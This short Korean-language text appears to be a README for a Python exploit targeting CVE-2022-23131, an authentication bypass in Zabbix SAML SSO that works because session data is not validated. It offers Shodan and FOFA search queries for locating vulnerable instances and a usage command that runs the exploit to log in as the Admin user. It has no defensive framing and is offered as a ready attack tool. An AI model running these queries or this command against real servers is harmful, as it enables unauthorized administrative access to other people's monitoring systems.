
Zabbix SAML SSO 인증 우회를 대상으로 하는 CVE-2022-23131용 Python 익스플로잇입니다. 취약한 인스턴스 검색을 위한 Shodan 및 FOFA dork를 포함합니다.
Zabbix - SAML SSO 인증 우회
SAML SSO 인증이 활성화된(기본값이 아닌) 인스턴스의 경우, 세션에 저장된 사용자 로그인이 검증되지 않았기 때문에 악의적인 행위자가 세션 데이터를 수정할 수 있습니다.
shodan-query: http.favicon.hash:892542951
fofa-query: app="ZABBIX-监控系统" && body="saml"
python3 zabbix_session_exp.py -t https:target.com -u Admin